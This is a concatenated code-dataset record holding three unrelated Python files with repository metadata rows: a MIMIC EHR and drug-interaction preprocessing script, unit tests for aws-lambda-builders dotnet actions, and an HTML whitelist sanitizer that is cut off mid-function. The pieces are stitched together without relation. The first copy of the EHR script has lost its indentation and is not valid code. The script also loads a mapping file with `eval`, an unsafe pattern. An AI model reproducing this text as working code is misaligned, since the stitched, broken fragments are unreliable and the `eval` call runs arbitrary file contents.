drug_ddi_file = 'data/drug-DDI.csv'
drug_stitch2atc_file = 'data/drug_stitch2atc.csv'
DDI_MATRIX_FILE = 'data/ddi_matrix_tail_top100.pkl'
EHR_MATRIX_FILE = 'data/ehr_matrix_1.0.pkl'
PATIENT_RECORDS_FILE = 'data/patient_records.pkl'
PATIENT_RECORDS_FINAL_FILE = 'data/patient_records_final.pkl'
PATIENT_RECORDS_FILE_ACCUMULATE = 'data/patient_records_accumulate_tail_top100.pkl'
PATIENT_RECORDS_FILE_SEPARATE = 'data/patient_records_separate_tail_top100.pkl'
CONCEPTID_FILE = 'data/concepts2id_mapping.pkl'
# DIAGNOSES_INDEX = 0
# PROCEDURES_INDEX = 1
# MEDICATIONS_INDEX = 2
VOC_FILE = 'data/voc.pkl'
GRAPH_FILE = 'data/graph.pkl'
# ===================处理原始EHR数据,选取对应记录================
# we borrow part of the codes from https://github.com/sjy1203/GAMENet
# ======================
# given a sequence of medical concepts, obtain their ids and store the mapping
if __name__ == '__main__':
process_ehr()
map_concepts2id()
build_ddi_matrix()
build_patient_records()
data_sampling()
build_co_occurrence_matrix()
| 41.740196 | 150 | 0.661362 | import csv
import dill
import itertools
import math
import pandas as pd
import numpy as np
from itertools import combinations
from sklearn.model_selection import train_test_split
from tqdm import tqdm
med_file = 'data/PRESCRIPTIONS.csv'
diag_file = 'data/DIAGNOSES_ICD.csv'
procedure_file = 'data/PROCEDURES_ICD.csv'
ndc2atc_file = 'data/ndc2atc_level4.csv'
cid_atc = 'data/drug-atc.csv'
ndc2rxnorm_file = 'data/ndc2rxnorm_mapping.txt'
drug_ddi_file = 'data/drug-DDI.csv'
drug_stitch2atc_file = 'data/drug_stitch2atc.csv'
DDI_MATRIX_FILE = 'data/ddi_matrix_tail_top100.pkl'
EHR_MATRIX_FILE = 'data/ehr_matrix_1.0.pkl'
PATIENT_RECORDS_FILE = 'data/patient_records.pkl'
PATIENT_RECORDS_FINAL_FILE = 'data/patient_records_final.pkl'
PATIENT_RECORDS_FILE_ACCUMULATE = 'data/patient_records_accumulate_tail_top100.pkl'
PATIENT_RECORDS_FILE_SEPARATE = 'data/patient_records_separate_tail_top100.pkl'
CONCEPTID_FILE = 'data/concepts2id_mapping.pkl'
# DIAGNOSES_INDEX = 0
# PROCEDURES_INDEX = 1
# MEDICATIONS_INDEX = 2
VOC_FILE = 'data/voc.pkl'
GRAPH_FILE = 'data/graph.pkl'
# ===================处理原始EHR数据,选取对应记录================
# we borrow part of the codes from https://github.com/sjy1203/GAMENet
def process_procedure():
pro_pd = pd.read_csv(procedure_file, dtype={'ICD9_CODE': 'category'})
pro_pd.drop(columns=['ROW_ID'], inplace=True)
# pro_pd = pro_pd[pro_pd['SEQ_NUM']<5]
# def icd9_tree(x):
# if x[0]=='E':
# return x[:4]
# return x[:3]
# pro_pd['ICD9_CODE'] = pro_pd['ICD9_CODE'].map(icd9_tree)
pro_pd.drop_duplicates(inplace=True)
pro_pd.sort_values(by=['SUBJECT_ID', 'HADM_ID', 'SEQ_NUM'], inplace=True)
pro_pd.drop(columns=['SEQ_NUM'], inplace=True)
pro_pd.drop_duplicates(inplace=True)
pro_pd.reset_index(drop=True, inplace=True)
return pro_pd
def process_med():
med_pd = pd.read_csv(med_file, dtype={'NDC': 'category'})
# filter
med_pd.drop(columns=['ROW_ID', 'DRUG_TYPE', 'DRUG_NAME_POE', 'DRUG_NAME_GENERIC',
'FORMULARY_DRUG_CD', 'GSN', 'PROD_STRENGTH', 'DOSE_VAL_RX',
'DOSE_UNIT_RX', 'FORM_VAL_DISP', 'FORM_UNIT_DISP', 'FORM_UNIT_DISP',
'ROUTE', 'ENDDATE', 'DRUG'], axis=1, inplace=True)
med_pd.drop(index=med_pd[med_pd['NDC'] == '0'].index, axis=0, inplace=True)
med_pd.fillna(method='pad', inplace=True)
med_pd.dropna(inplace=True)
med_pd.drop_duplicates(inplace=True)
med_pd['ICUSTAY_ID'] = med_pd['ICUSTAY_ID'].astype('int64')
med_pd['STARTDATE'] = pd.to_datetime(med_pd['STARTDATE'], format='%Y-%m-%d %H:%M:%S')
med_pd.sort_values(by=['SUBJECT_ID', 'HADM_ID', 'ICUSTAY_ID', 'STARTDATE'], inplace=True)
med_pd = med_pd.reset_index(drop=True)
def filter_first24hour_med(med_pd):
med_pd_new = med_pd.drop(columns=['NDC'])
med_pd_new = med_pd_new.groupby(by=['SUBJECT_ID', 'HADM_ID', 'ICUSTAY_ID']).head([1]).reset_index(drop=True)
med_pd_new = pd.merge(med_pd_new, med_pd, on=['SUBJECT_ID', 'HADM_ID', 'ICUSTAY_ID', 'STARTDATE'])
med_pd_new = med_pd_new.drop(columns=['STARTDATE'])
return med_pd_new
med_pd = filter_first24hour_med(med_pd)
# med_pd = med_pd.drop(columns=['STARTDATE'])
med_pd = med_pd.drop(columns=['ICUSTAY_ID'])
med_pd = med_pd.drop_duplicates()
med_pd = med_pd.reset_index(drop=True)
# visit > 2
def process_visit_lg2(med_pd):
a = med_pd[['SUBJECT_ID', 'HADM_ID']].groupby(by='SUBJECT_ID')['HADM_ID'].unique().reset_index()
a['HADM_ID_Len'] = a['HADM_ID'].map(lambda x: len(x))
a = a[a['HADM_ID_Len'] > 1]
return a
med_pd_lg2 = process_visit_lg2(med_pd).reset_index(drop=True)
med_pd = med_pd.merge(med_pd_lg2[['SUBJECT_ID']], on='SUBJECT_ID', how='inner')
return med_pd.reset_index(drop=True)
def process_diag():
diag_pd = pd.read_csv(diag_file)
diag_pd.dropna(inplace=True)
diag_pd.drop(columns=['SEQ_NUM', 'ROW_ID'], inplace=True)
diag_pd.drop_duplicates(inplace=True)
diag_pd.sort_values(by=['SUBJECT_ID', 'HADM_ID'], inplace=True)
return diag_pd.reset_index(drop=True)
def ndc2atc4(med_pd):
with open(ndc2rxnorm_file, 'r') as f:
ndc2rxnorm = eval(f.read())
med_pd['RXCUI'] = med_pd['NDC'].map(ndc2rxnorm)
med_pd.dropna(inplace=True)
rxnorm2atc = pd.read_csv(ndc2atc_file)
rxnorm2atc = rxnorm2atc.drop(columns=['YEAR', 'MONTH', 'NDC'])
rxnorm2atc.drop_duplicates(subset=['RXCUI'], inplace=True)
med_pd.drop(index=med_pd[med_pd['RXCUI'].isin([''])].index, axis=0, inplace=True)
med_pd['RXCUI'] = med_pd['RXCUI'].astype('int64')
med_pd = med_pd.reset_index(drop=True)
med_pd = med_pd.merge(rxnorm2atc, on=['RXCUI'])
med_pd.drop(columns=['NDC', 'RXCUI'], inplace=True)
med_pd = med_pd.rename(columns={'ATC4': 'NDC'})
med_pd['NDC'] = med_pd['NDC'].map(lambda x: x[:4])
med_pd = med_pd.drop_duplicates()
med_pd = med_pd.reset_index(drop=True)
return med_pd
def filter_1000_most_pro(pro_pd):
pro_count = pro_pd.groupby(by=['ICD9_CODE']).size().reset_index().rename(columns={0: 'count'}).sort_values(
by=['count'], ascending=False).reset_index(drop=True)
pro_pd = pro_pd[pro_pd['ICD9_CODE'].isin(pro_count.loc[:1000, 'ICD9_CODE'])]
return pro_pd.reset_index(drop=True)
def filter_2000_most_diag(diag_pd):
diag_count = diag_pd.groupby(by=['ICD9_CODE']).size().reset_index().rename(columns={0: 'count'}).sort_values(
by=['count'], ascending=False).reset_index(drop=True)
diag_pd = diag_pd[diag_pd['ICD9_CODE'].isin(diag_count.loc[:1999, 'ICD9_CODE'])]
return diag_pd.reset_index(drop=True)
def filter_300_most_med(med_pd):
med_count = med_pd.groupby(by=['NDC']).size().reset_index().rename(columns={0: 'count'}).sort_values(by=['count'],
ascending=False).reset_index(
drop=True)
med_pd = med_pd[med_pd['NDC'].isin(med_count.loc[:299, 'NDC'])]
return med_pd.reset_index(drop=True)
def process_ehr():
# get med and diag (visit>=2)
med_pd = process_med()
med_pd = ndc2atc4(med_pd)
# med_pd = filter_300_most_med(med_pd)
diag_pd = process_diag()
diag_pd = filter_2000_most_diag(diag_pd)
pro_pd = process_procedure()
# pro_pd = filter_1000_most_pro(pro_pd)
med_pd_key = med_pd[['SUBJECT_ID', 'HADM_ID']].drop_duplicates()
diag_pd_key = diag_pd[['SUBJECT_ID', 'HADM_ID']].drop_duplicates()
pro_pd_key = pro_pd[['SUBJECT_ID', 'HADM_ID']].drop_duplicates()
combined_key = med_pd_key.merge(diag_pd_key, on=['SUBJECT_ID', 'HADM_ID'], how='inner')
combined_key = combined_key.merge(pro_pd_key, on=['SUBJECT_ID', 'HADM_ID'], how='inner')
diag_pd = diag_pd.merge(combined_key, on=['SUBJECT_ID', 'HADM_ID'], how='inner')
med_pd = med_pd.merge(combined_key, on=['SUBJECT_ID', 'HADM_ID'], how='inner')
pro_pd = pro_pd.merge(combined_key, on=['SUBJECT_ID', 'HADM_ID'], how='inner')
# flatten and merge
diag_pd = diag_pd.groupby(by=['SUBJECT_ID', 'HADM_ID'])['ICD9_CODE'].unique().reset_index()
med_pd = med_pd.groupby(by=['SUBJECT_ID', 'HADM_ID'])['NDC'].unique().reset_index()
pro_pd = pro_pd.groupby(by=['SUBJECT_ID', 'HADM_ID'])['ICD9_CODE'].unique().reset_index().rename(
columns={'ICD9_CODE': 'PRO_CODE'})
med_pd['NDC'] = med_pd['NDC'].map(lambda x: list(x))
pro_pd['PRO_CODE'] = pro_pd['PRO_CODE'].map(lambda x: list(x))
data = diag_pd.merge(med_pd, on=['SUBJECT_ID', 'HADM_ID'], how='inner')
data = data.merge(pro_pd, on=['SUBJECT_ID', 'HADM_ID'], how='inner')
# data['ICD9_CODE_Len'] = data['ICD9_CODE'].map(lambda x: len(x))
data['NDC_Len'] = data['NDC'].map(lambda x: len(x))
patient_records = []
for subject_id in data['SUBJECT_ID'].unique():
item_df = data[data['SUBJECT_ID'] == subject_id]
patient = []
for index, row in item_df.iterrows():
admission = []
admission.append([item for item in row['NDC']]) # medications
admission.append([item for item in row['ICD9_CODE']]) # diagnoses
admission.append([item for item in row['PRO_CODE']]) # procedures
patient.append(admission)
patient_records.append(patient)
dill.dump(patient_records, open(PATIENT_RECORDS_FILE, 'wb'))
# ======================
class Concept2Id(object):
def __init__(self):
self.concept2id = {}
self.id2concept = {}
# given a sequence of medical concepts, obtain their ids and store the mapping
def add_concepts(self, concepts):
for item in concepts:
if item not in self.concept2id.keys():
# self.id2concept[len(self.concept2id)] = item
self.concept2id[item] = len(self.concept2id)
self.id2concept[self.concept2id.get(item)] = item
def get_concept_count(self):
return len(self.concept2id)
def map_concepts2id():
concept2id_prescriptions = Concept2Id()
concept2id_diagnoses = Concept2Id()
concept2id_procedures = Concept2Id()
patient_records = dill.load(open(PATIENT_RECORDS_FILE, 'rb'))
for patient in patient_records:
for adm in patient:
medications, diagnoses, procedures = adm[0], adm[1], adm[2]
concept2id_prescriptions.add_concepts(medications)
concept2id_diagnoses.add_concepts(diagnoses)
concept2id_procedures.add_concepts(procedures)
dill.dump({'concept2id_prescriptions': concept2id_prescriptions, 'concept2id_diagnoses': concept2id_diagnoses,
'concept2id_procedures': concept2id_procedures}, open(CONCEPTID_FILE, 'wb'))
def build_ddi_matrix():
topN = 100
drug_ddi_df = pd.read_csv(drug_ddi_file)
ddi_most_pd = drug_ddi_df.groupby(by=['Polypharmacy Side Effect', 'Side Effect Name']).size().reset_index().rename(
columns={0: 'count'}).sort_values(by=['count'], ascending=False).reset_index(drop=True)
ddi_most_pd = ddi_most_pd.iloc[-topN:, :]
fliter_ddi_df = drug_ddi_df.merge(ddi_most_pd[['Side Effect Name']], how='inner', on=['Side Effect Name'])
ddi_df = fliter_ddi_df[['STITCH 1', 'STITCH 2']].drop_duplicates().reset_index(drop=True)
concept2id_prescriptions = dill.load(open(CONCEPTID_FILE, 'rb')).get('concept2id_prescriptions')
stitch2atc_dict = {}
with open(drug_stitch2atc_file, 'r') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for line in reader:
stitch_id = line[0]
atc_set = line[1:]
stitch2atc_dict[stitch_id] = atc_set
prescriptions_size = concept2id_prescriptions.get_concept_count()
ddi_matrix = np.zeros((prescriptions_size, prescriptions_size))
for index, row in ddi_df.iterrows():
stitch_id1 = row['STITCH 1']
stitch_id2 = row['STITCH 2']
if stitch_id1 in stitch2atc_dict.keys() and stitch_id2 in stitch2atc_dict.keys():
for atc_i in stitch2atc_dict[stitch_id1]:
for atc_j in stitch2atc_dict[stitch_id2]:
atc_i = atc_i[:4]
atc_j = atc_j[:4]
if atc_i in concept2id_prescriptions.concept2id.keys() and atc_j in concept2id_prescriptions.concept2id.keys() and atc_i != atc_j:
ddi_matrix[
concept2id_prescriptions.concept2id.get(atc_i), concept2id_prescriptions.concept2id.get(
atc_j)] = 1
ddi_matrix[
concept2id_prescriptions.concept2id.get(atc_j), concept2id_prescriptions.concept2id.get(
atc_i)] = 1
dill.dump({'ddi_matrix': ddi_matrix}, open(DDI_MATRIX_FILE, 'wb'))
def build_patient_records():
    """Translate raw patient records into vocabulary indices and add DDI rates.
    Each admission [medications, diagnoses, procedures] is mapped through the
    concept2id vocabularies, and the admission's medication DDI rate (fraction
    of interacting medication pairs) is appended as a 4th element. Saves
    {'patient_records': ...} to PATIENT_RECORDS_FINAL_FILE.
    """
    ddi_matrix = dill.load(open(DDI_MATRIX_FILE, 'rb'))['ddi_matrix']
    def get_ddi_rate(medications):
        # Fraction of unordered medication pairs in this admission that
        # interact according to ddi_matrix; 0 when fewer than 2 medications.
        med_pair_count = 0.0
        ddi_count = 0.0
        ddi_rate = 0
        for med_i, med_j in combinations(medications, 2):
            med_pair_count += 1
            if ddi_matrix[med_i][med_j] == 1:
                ddi_count += 1
        if med_pair_count != 0:
            ddi_rate = ddi_count / med_pair_count
        return ddi_rate
    concept2id_object = dill.load(open(CONCEPTID_FILE, 'rb'))
    concept2id_prescriptions = concept2id_object.get('concept2id_prescriptions')
    concept2id_diagnoses = concept2id_object.get('concept2id_diagnoses')
    concept2id_procedures = concept2id_object.get('concept2id_procedures')
    patient_records_idx = []
    patient_records = dill.load(open(PATIENT_RECORDS_FILE, 'rb'))
    for patient in patient_records:
        current_patient = []
        for adm in patient:
            # adm layout: [medications, diagnoses, procedures] as raw codes.
            medications, diagnoses, procedures = adm[0], adm[1], adm[2]
            admission = []
            admission.append([concept2id_prescriptions.concept2id.get(item) for item in medications])
            admission.append([concept2id_diagnoses.concept2id.get(item) for item in diagnoses])
            admission.append([concept2id_procedures.concept2id.get(item) for item in procedures])
            # DDI rate is computed on the indexed medication list.
            ddi_rate = get_ddi_rate(admission[0])
            admission.append([ddi_rate])
            current_patient.append(admission)
        patient_records_idx.append(current_patient)
    dill.dump({'patient_records': patient_records_idx}, open(PATIENT_RECORDS_FINAL_FILE, 'wb'))
def data_sampling():
    """Split patient records into train/test/validation sets, bucketed by DDI rate.
    Every admission prefix patient[:idx+1] becomes one sample, binned by the
    admission's DDI rate (rounded up to the next 0.1). Two files are written:
    PATIENT_RECORDS_FILE_SEPARATE (one split per exact bin) and
    PATIENT_RECORDS_FILE_ACCUMULATE (each bin also contains all lower bins).
    """
    ddi_rate_bins = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
    patient_records_split_by_ddi_rate = {}
    for ddi_rate in ddi_rate_bins:
        patient_records_split_by_ddi_rate[ddi_rate] = []
    patient_records = dill.load(open(PATIENT_RECORDS_FINAL_FILE, 'rb'))['patient_records']
    for patient in patient_records:
        for idx, admission in enumerate(patient):
            # admission[3][0] holds the DDI rate appended by build_patient_records.
            ddi_rate = admission[3][0]
            current_patient_record = patient[:idx + 1]
            # ceil(rate*10)/10 rounds the rate up to the matching 0.1-wide bin key.
            patient_records_split_by_ddi_rate[math.ceil(ddi_rate * 10.0) / 10].append(current_patient_record)
    train, test, validation = {}, {}, {}
    for ddi_rate, patients in patient_records_split_by_ddi_rate.items():
        # 90/10 train/test split, then 90/10 train/validation split per bin.
        train_patients, test_patients = train_test_split(patients, test_size=0.1)
        train_patients, validation_patients = train_test_split(train_patients, test_size=0.1)
        train[ddi_rate], test[ddi_rate], validation[ddi_rate] = train_patients, test_patients, validation_patients
    dill.dump({'train': train, 'test': test, 'validation': validation}, open(PATIENT_RECORDS_FILE_SEPARATE, 'wb'))
    print('patient records information stored separately by ddi rate')
    print('training dataset:')
    for key, value in train.items():
        print(key, len(value), end=';')
    print()
    print('test dataset')
    for key, value in test.items():
        print(key, len(value), end=';')
    print()
    print('validation dataset')
    for key, value in validation.items():
        print(key, len(value), end=';')
    print()
    # Accumulate: bin r also receives everything from bin r-0.1, so after this
    # loop each bin holds all samples with DDI rate <= r. round(..., 1) is
    # needed so the float key matches the literal bin values exactly.
    for ddi_rate in ddi_rate_bins[1:]:
        train[ddi_rate] = train[ddi_rate] + train[round(ddi_rate - 0.1, 1)]
        test[ddi_rate] = test[ddi_rate] + test[round(ddi_rate - 0.1, 1)]
        validation[ddi_rate] = validation[ddi_rate] + validation[round(ddi_rate - 0.1, 1)]
    dill.dump({'train': train, 'test': test, 'validation': validation}, open(PATIENT_RECORDS_FILE_ACCUMULATE, 'wb'))
    print('patient records information stored accumulately by ddi rate')
    print('training dataset:')
    for key, value in train.items():
        print(key, len(value), end=';')
    print()
    print('test dataset')
    for key, value in test.items():
        print(key, len(value), end=';')
    print()
    print('validation dataset')
    for key, value in validation.items():
        print(key, len(value), end=';')
    print()
def build_co_occurrence_matrix():
    """Build a binary medication co-prescription matrix from the training split.
    Iterates the accumulated training set (bin 1.0, i.e. all DDI rates) and
    sets matrix[i, j] = matrix[j, i] = 1 whenever medications i and j appear
    in the same admission. Despite the name, the matrix is binary, not a
    count. The result is saved to EHR_MATRIX_FILE.
    """
    # Admissions with a DDI rate above this threshold are skipped; 1.0 accepts all.
    patient_ddi_rate = 1.0
    concept2id_object = dill.load(open(CONCEPTID_FILE, 'rb'))
    concept2id_medication = concept2id_object.get('concept2id_prescriptions')
    medication_count = concept2id_medication.get_concept_count()
    matrix = np.zeros((medication_count, medication_count))
    patient_records = dill.load(open(PATIENT_RECORDS_FILE_ACCUMULATE, 'rb'))['train'][1.0]
    # count tracks how many pairs were seen (diagnostic only; not persisted).
    count = 0
    for patient in patient_records:
        for admission in patient:
            # admission[-1][0] is the DDI rate stored by build_patient_records.
            if admission[-1][0] <= patient_ddi_rate:
                medications = admission[0]
                for med_i, med_j in combinations(medications, 2):
                    count += 1
                    matrix[med_i][med_j] = 1
                    matrix[med_j][med_i] = 1
    dill.dump(matrix, open(EHR_MATRIX_FILE, 'wb'))
    # Print the distribution of 0/1 entries as a sanity check.
    unique, counts = np.unique(matrix, return_counts=True)
    print(dict(zip(unique, counts)))
if __name__ == '__main__':
    # Full preprocessing pipeline: raw EHR -> concept vocabularies ->
    # DDI matrix -> indexed patient records -> DDI-rate splits ->
    # medication co-occurrence matrix.
    process_ehr()
    map_concepts2id()
    build_ddi_matrix()
    build_patient_records()
    data_sampling()
    build_co_occurrence_matrix()
| 15,128 | 4 | 401 |
1df2694a3bb7653200bc5f5e27eae8c5e5f858e0 | 5,223 | py | Python | tests/unit/workflows/dotnet_clipackage/test_actions.py | wchengru/aws-lambda-builders | 0f2abdcb3a83ab46440abd6a6c4350ce67fd1f7a | [
"Apache-2.0"
] | 1 | 2021-07-10T14:34:20.000Z | 2021-07-10T14:34:20.000Z | tests/unit/workflows/dotnet_clipackage/test_actions.py | wchengru/aws-lambda-builders | 0f2abdcb3a83ab46440abd6a6c4350ce67fd1f7a | [
"Apache-2.0"
] | null | null | null | tests/unit/workflows/dotnet_clipackage/test_actions.py | wchengru/aws-lambda-builders | 0f2abdcb3a83ab46440abd6a6c4350ce67fd1f7a | [
"Apache-2.0"
] | null | null | null | from unittest import TestCase
from concurrent.futures import ThreadPoolExecutor
from mock import patch
import os
import platform
from aws_lambda_builders.actions import ActionFailedError
from aws_lambda_builders.workflows.dotnet_clipackage.dotnetcli import DotnetCLIExecutionError
from aws_lambda_builders.workflows.dotnet_clipackage.actions import GlobalToolInstallAction, RunPackageAction
@patch.object(GlobalToolInstallAction, "_GlobalToolInstallAction__tools_installed", False)
| 38.404412 | 117 | 0.684664 | from unittest import TestCase
from concurrent.futures import ThreadPoolExecutor
from mock import patch
import os
import platform
from aws_lambda_builders.actions import ActionFailedError
from aws_lambda_builders.workflows.dotnet_clipackage.dotnetcli import DotnetCLIExecutionError
from aws_lambda_builders.workflows.dotnet_clipackage.actions import GlobalToolInstallAction, RunPackageAction
@patch.object(GlobalToolInstallAction, "_GlobalToolInstallAction__tools_installed", False)
class TestGlobalToolInstallAction(TestCase):
    """Unit tests for GlobalToolInstallAction (installs Amazon.Lambda.Tools).
    The class-level patch resets the name-mangled __tools_installed flag so
    every test starts as if the tool had never been installed.
    """
    @patch("aws_lambda_builders.workflows.dotnet_clipackage.dotnetcli.SubprocessDotnetCLI")
    def setUp(self, MockSubprocessDotnetCLI):
        """Give each test a fresh mocked dotnet CLI wrapper instance."""
        self.subprocess_dotnet = MockSubprocessDotnetCLI.return_value
    def tearDown(self):
        """Clear recorded calls so assertions never leak between tests."""
        self.subprocess_dotnet.reset_mock()
    def test_global_tool_install(self):
        """A plain install runs 'dotnet tool install' exactly once."""
        action = GlobalToolInstallAction(self.subprocess_dotnet)
        action.execute()
        self.subprocess_dotnet.run.assert_called_once_with(
            ["tool", "install", "-g", "Amazon.Lambda.Tools", "--ignore-failed-sources"]
        )
    def test_global_tool_update(self):
        """If install fails (already installed), the action falls back to update."""
        self.subprocess_dotnet.run.side_effect = [DotnetCLIExecutionError(message="Already Installed"), None]
        action = GlobalToolInstallAction(self.subprocess_dotnet)
        action.execute()
        self.subprocess_dotnet.run.assert_any_call(
            ["tool", "install", "-g", "Amazon.Lambda.Tools", "--ignore-failed-sources"]
        )
        self.subprocess_dotnet.run.assert_any_call(
            ["tool", "update", "-g", "Amazon.Lambda.Tools", "--ignore-failed-sources"]
        )
    def test_global_tool_update_failed(self):
        """If both install and update fail, the action raises ActionFailedError."""
        self.subprocess_dotnet.run.side_effect = [
            DotnetCLIExecutionError(message="Already Installed"),
            DotnetCLIExecutionError(message="Updated Failed"),
        ]
        action = GlobalToolInstallAction(self.subprocess_dotnet)
        self.assertRaises(ActionFailedError, action.execute)
    def test_global_tool_parallel(self):
        """Concurrent executions still install the tool only once."""
        actions = [
            GlobalToolInstallAction(self.subprocess_dotnet),
            GlobalToolInstallAction(self.subprocess_dotnet),
            GlobalToolInstallAction(self.subprocess_dotnet),
        ]
        with ThreadPoolExecutor() as executor:
            for action in actions:
                executor.submit(action.execute)
        self.subprocess_dotnet.run.assert_called_once_with(
            ["tool", "install", "-g", "Amazon.Lambda.Tools", "--ignore-failed-sources"]
        )
class TestRunPackageAction(TestCase):
    """Unit tests for RunPackageAction ('dotnet lambda package')."""
    # Fix: mock.patch decorators are applied bottom-up, so the decorator
    # closest to the function supplies the FIRST mock argument. The original
    # ordering handed the OSUtils mock to ``MockSubprocessDotnetCLI`` and the
    # SubprocessDotnetCLI mock to ``MockOSUtils``. The tests still passed
    # (both are generic MagicMocks), but the names lied; the decorators are
    # reordered here so each parameter receives the mock its name claims.
    @patch("aws_lambda_builders.workflows.dotnet_clipackage.utils.OSUtils")
    @patch("aws_lambda_builders.workflows.dotnet_clipackage.dotnetcli.SubprocessDotnetCLI")
    def setUp(self, MockSubprocessDotnetCLI, MockOSUtils):
        """Create fresh mocks and the common directory paths for each test."""
        self.subprocess_dotnet = MockSubprocessDotnetCLI.return_value
        # NOTE(review): this stores the mock class, not .return_value, unlike
        # subprocess_dotnet above — kept as-is since tests only pass it through.
        self.os_utils = MockOSUtils
        self.source_dir = os.path.join("/source_dir")
        self.artifacts_dir = os.path.join("/artifacts_dir")
        self.scratch_dir = os.path.join("/scratch_dir")
    def tearDown(self):
        """Clear recorded calls so assertions never leak between tests."""
        self.subprocess_dotnet.reset_mock()
    def test_build_package(self):
        """Release build runs 'dotnet lambda package' into the artifacts dir."""
        mode = "Release"
        options = {}
        action = RunPackageAction(
            self.source_dir, self.subprocess_dotnet, self.artifacts_dir, options, mode, self.os_utils
        )
        action.execute()
        zipFilePath = os.path.join("/", "artifacts_dir", "source_dir.zip")
        self.subprocess_dotnet.run.assert_called_once_with(
            ["lambda", "package", "--output-package", zipFilePath], cwd="/source_dir"
        )
    def test_build_package_arguments(self):
        """Extra options (e.g. --framework) are forwarded to the CLI call."""
        mode = "Release"
        options = {"--framework": "netcoreapp2.1"}
        action = RunPackageAction(
            self.source_dir, self.subprocess_dotnet, self.artifacts_dir, options, mode, self.os_utils
        )
        action.execute()
        # Path separators differ per OS because the action joins paths natively.
        if platform.system().lower() == "windows":
            zipFilePath = "/artifacts_dir\\source_dir.zip"
        else:
            zipFilePath = "/artifacts_dir/source_dir.zip"
        self.subprocess_dotnet.run.assert_called_once_with(
            ["lambda", "package", "--output-package", zipFilePath, "--framework", "netcoreapp2.1"], cwd="/source_dir"
        )
    def test_build_error(self):
        """A failing CLI invocation is surfaced as ActionFailedError."""
        mode = "Release"
        self.subprocess_dotnet.run.side_effect = DotnetCLIExecutionError(message="Failed Package")
        options = {}
        action = RunPackageAction(
            self.source_dir, self.subprocess_dotnet, self.artifacts_dir, options, mode, self.os_utils
        )
        self.assertRaises(ActionFailedError, action.execute)
    def test_debug_configuration_set(self):
        """Debug mode appends '--configuration Debug' to the CLI call."""
        mode = "Debug"
        options = None
        action = RunPackageAction(
            self.source_dir, self.subprocess_dotnet, self.artifacts_dir, options, mode, self.os_utils
        )
        zipFilePath = os.path.join("/", "artifacts_dir", "source_dir.zip")
        action.execute()
        self.subprocess_dotnet.run.assert_called_once_with(
            ["lambda", "package", "--output-package", zipFilePath, "--configuration", "Debug"], cwd="/source_dir"
        )
| 4,070 | 621 | 45 |
77628e4e80f121e07de23f836240620bb990306b | 3,783 | py | Python | htmlfilter/__init__.py | samueladam/htmlfilter | 32c9a3ac50214e20bc4f8b85e9e8e5fcd137ff3f | [
"BSD-3-Clause"
] | null | null | null | htmlfilter/__init__.py | samueladam/htmlfilter | 32c9a3ac50214e20bc4f8b85e9e8e5fcd137ff3f | [
"BSD-3-Clause"
] | 1 | 2021-04-29T14:29:39.000Z | 2021-04-29T14:29:39.000Z | htmlfilter/__init__.py | samueladam/htmlfilter | 32c9a3ac50214e20bc4f8b85e9e8e5fcd137ff3f | [
"BSD-3-Clause"
] | null | null | null | import re
from collections import defaultdict
import rules
attrs_re = re.compile(r"""\s*(\w+)\s*=\s*(["'])(.*?)(?<!\\)\2""", re.DOTALL)
class HTMLFilter:
"""Simple HTML white list filter.
Usage:
hf = HTMLFilter()
filtered_html = hf.filter(html)
The filter parses the code for < and > characters.
It tries to correct malformed tags and close them.
Use it with a WYSIWYG editor on the client side
to convert user's < and > inputs into < and >
For the tough stuff, prefer BeautifulSoup.
"""
| 32.059322 | 84 | 0.486651 | import re
from collections import defaultdict
import rules
attrs_re = re.compile(r"""\s*(\w+)\s*=\s*(["'])(.*?)(?<!\\)\2""", re.DOTALL)
class HTMLFilter:
    """Simple HTML white list filter.
    Usage:
    hf = HTMLFilter()
    filtered_html = hf.filter(html)
    The filter parses the code for < and > characters.
    It tries to correct malformed tags and close them.
    Use it with a WYSIWYG editor on the client side
    to convert user's < and > inputs into &lt; and &gt;
    For the tough stuff, prefer BeautifulSoup.
    """
    # NOTE(review): Python 2 code (iteritems/xrange); the whitelist comes from
    # the sibling `rules` module (TAGS / NON_CLOSING / OVERLAPPING).
    def __init__(self, rules=rules):
        # default config
        self.rules = rules
        # other tags and attributes are removed
        self.allowed = hasattr(rules, 'TAGS') and rules.TAGS or {}
        # <tag />
        self.non_closing = hasattr(rules, 'NON_CLOSING') and rules.NON_CLOSING or []
        # <blockquote><blockquote></blockquote></blockquote>
        self.overlapping = hasattr(rules, 'OVERLAPPING') and rules.OVERLAPPING or []
    def filter(self, data):
        """Return *data* with non-whitelisted tags/attributes stripped and
        any still-open tags closed at the end."""
        # reset
        self.filtered_data = filtered_data = []
        self.open_tags = open_tags = defaultdict(int)
        handle_data = self.handle_data
        # Every '<' starts a potential tag; text before the first '<' is kept verbatim.
        chunks = data.split('<')
        filtered_data.append(chunks.pop(0))
        for chunk in chunks:
            handle_data(chunk)
        # close open tags
        for tag, times in open_tags.iteritems():
            for i in xrange(times):
                filtered_data.extend(['</', tag, '>'])
        return ''.join(self.filtered_data)
    def handle_data(self, chunk):
        """Split one '<'-delimited chunk into tag data and trailing text."""
        if chunk:
            if '>' in chunk:
                tagdata, text = chunk.split('>', 1)
            else:
                # the tag didn't end
                tagdata, text = chunk, ''
            self.handle_tag(tagdata)
            self.filtered_data.append(text)
    def handle_tag(self, tagdata):
        """Dispatch raw tag text to the start- or end-tag handler."""
        attrs = tagdata.strip().split(' ', 1)
        tag = attrs.pop(0).lower()
        if tag:
            if tag[0] == '/':
                self.handle_endtag(tag[1:])
            else:
                if attrs:
                    # find the attributes
                    attrs = [(a[0], a[2]) for a in attrs_re.findall(attrs[0])]
                self.handle_starttag(tag, attrs)
    def handle_starttag(self, tag, attrs):
        """Emit *tag* with whitelisted attributes; drop disallowed tags entirely."""
        if tag in self.allowed:
            # open tags check
            if tag in self.non_closing:
                tag_tail = ' /'
            else:
                # Auto-close a duplicate of a non-overlapping tag before reopening it.
                if tag not in self.overlapping and self.open_tags[tag] > 0:
                    self.handle_endtag(tag)
                self.open_tags[tag] += 1
                tag_tail = ''
            # filter attributes
            filtered_attrs = {}
            for attr, val in attrs:
                if attr in self.allowed[tag]:
                    # An optional per-attribute hook named "<tag>_<attr>" in the
                    # rules module may rewrite (or veto) the value.
                    filterfn = "%s_%s" % (tag, attr)
                    if hasattr(self.rules, filterfn):
                        val = getattr(self.rules, filterfn)(val)
                    if val:
                        filtered_attrs[attr] = val
            self.filtered_data.extend(
                ['<',
                tag,
